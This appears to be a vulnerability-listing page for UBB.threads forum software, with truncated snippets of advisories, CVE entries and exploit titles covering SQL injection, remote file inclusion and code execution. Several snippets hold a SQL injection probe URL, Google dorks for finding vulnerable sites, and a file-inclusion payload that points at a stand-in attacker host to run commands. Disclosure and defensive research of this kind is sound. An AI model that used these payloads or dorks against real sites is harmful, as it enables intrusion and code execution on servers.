ubb-sql.txt

UBB.threads SQL Injection Vulnerability The variable 'C' in UBB.threads is susceptible to SQL injection. Vulnerability: http://target.com/ubbthreads.php?Cat=cat&C=' Vulnerable: UBB.threads = 6.1.1 Google d0rk: allintitle:"Forums powered by UBB.threads" John Martinelli [email protected]...

UBBCentral UBB.Threads 6.1.1 - UBBThreads.php SQL Injection

UBBCentral UBB.Threads 6.1.1 - UBBThreads.php SQL Injection source: https://www.securityfocus.com/bid/23369/info UBB.threads is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow a...

UBB.threads (<= 6.1.1) SQL Injection Vulnerability

UBB.threads SQL Injection Vulnerability The variable 'C' in UBB.threads is susceptible to SQL injection. Vulnerability: http://target.com/ubbthreads.php?Cat=cat&C=' Vulnerable: UBB.threads = 6.1.1 Google d0rk: allintitle:"Forums powered by UBB.threads" John Martinelli [email protected]...

UBBCentral UBB.Threads 6.1.1 - 'UBBThreads.php' SQL Injection

source: https://www.securityfocus.com/bid/23369/info UBB.threads is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify...

UBB.threads-6.txt

Hello,, UBB.threads Multiple input validation error Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [email protected] Tested on Version 6 6.5.1.1 and other versions maybe affected Remote File including :...

CVE-2006-5137

Multiple direct static code injection vulnerabilities in Groupee UBB.threads 6.5.1.1 allow remote attackers to 1 inject PHP code via a theme array parameter to admin/doedittheme.php, which is injected into includes/theme.inc.php; 2 inject PHP code via a config array parameter to...

CVE-2006-5138

CVE-2006-5138 affects Groupee UBB.threads 6.5.1.1. The vulnerability allows remote attackers to obtain sensitive information via a direct request to cron/php/subscriptions.php, which reveals the installation path in an error message. This is a information disclosure issue reported in multiple sou...

UBB.threads doeditconfig Arbitrary Command Injection

The version of UBB.threads installed on the remote host fails to sanitize input to the 'thispath' and 'config' parameters of the 'admin/doeditconfig.php' script before using them to update the application's configuration file. Provided PHP's 'registerglobals' setting is enabled, an unauthenticate...

UBBCentral UBB.Threads 6.5.1.1 - doeditconfig.php Code Execution

UBBCentral UBB.Threads 6.5.1.1 - doeditconfig.php Code Execution !/usr/bin/php -q -d shortopentag=on ? // UBB.threads Multiple input validation error // Discovered By : HACKERS PAL // Copy rights : HACKERS PAL // Website : http://www.soqor.net // Email Address : [email protected] // Tested on...

UBB.threads Multiple input validation error

Hello,, UBB.threads Multiple input validation error Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [email protected] Tested on Version 6 6.5.1.1 and other versions maybe affected Remote File including :...

UBB.threads <= 6.5.1.1 (doeditconfig.php) Code Execution Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? // UBB.threads Multiple input validation error // Discovered By : HACKERS PAL // Copy rights : HACKERS PAL // Website : http://www.soqor.net // Email Address : [email protected] // Tested on Version 6 6.5.1.1 and other...

UBB.threads <= 6.5.1.1 (doeditconfig.php) Code Execution Exploit

Exploit for unknown platform in category web applications ================================================================ UBB.threads = 6.5.1.1 doeditconfig.php Code Execution Exploit ================================================================ !/usr/bin/php -q -d shortopentag=on ? //...

UBBCentral UBB.Threads 6.5.1.1 - &#039;doeditconfig.php&#039; Code Execution

!/usr/bin/php -q -d shortopentag=on ? // UBB.threads Multiple input validation error // Discovered By : HACKERS PAL // Copy rights : HACKERS PAL // Website : http://www.soqor.net // Email Address : [email protected] // Tested on Version 6 6.5.1.1 and other versions maybe affected // Remote File...

UBB.threads ubbthreads.php debug Parameter XSS

The version of UBB.threads installed on the remote host fails to sanitize input to the 'debug' parameter before using it in the 'ubbthreads.php' script for dynamically-generated content. Regardless of any PHP settings, an unauthenticated attacker may be able to exploit this flaw to inject arbitra...

UBB.threads addpost_newpoll.php thispath Parameter Remote File Inclusion

The version of UBB.threads installed on the remote host fails to sanitize input to the 'thispath' parameter before using it in a PHP include function in the 'addpostnewpoll.php' script. Provided PHP's 'registerglobals' setting is enabled, an unauthenticated attacker may be able to exploit this fl...

CVE-2006-2568

PHP remote file inclusion vulnerability in addpostnewpoll.php in UBB.threads 6.4 through 6.5.2 and 6.5.1.1 trial allows remote attackers to execute arbitrary PHP code via a URL in the thispath parameter...

UBB.threads &gt;= 6.4.x Remote File Inclusion

Anomaly 1n The System presents UBB.threads = 6.4.x Remote File Inclusion founded by V4mu in 04/20/2006 URL: http://www.ubbcentral.com Google dork: allinurl:"/ubbthreads/" exploit: /addpostnewpoll.php?addpoll=preview&thispath=http://attacker/cmd.gif?&cmd=id contact: irc.gigachat.net A1TS milw0rm.c...

UBBCentral UBB.Threads 6.4.x &lt; 6.5.2 - &#039;thispath&#039; Remote File Inclusion

Anomaly 1n The System presents UBB.threads = 6.4.x Remote File Inclusion founded by V4mu in 04/20/2006 URL: http://www.ubbcentral.com Google dork: allinurl:"/ubbthreads/" exploit: /addpostnewpoll.php?addpoll=preview&thispath=http://attacker/cmd.gif?&cmd=id contact: irc.gigachat.net A1TS milw0rm.c...

CVE-2006-1423

SQL injection vulnerability in showflat.php in UBB.threads 5.5.1, 6.0 br5, 6.0.1, 6.0.2, and earlier, allows remote attackers to execute arbitrary SQL commands via the Number parameter...

Sql injection

SQL injection vulnerability in showflat.php in UBB.threads 5.5.1, 6.0 br5, 6.0.1, 6.0.2, and earlier, allows remote attackers to execute arbitrary SQL commands via the Number parameter...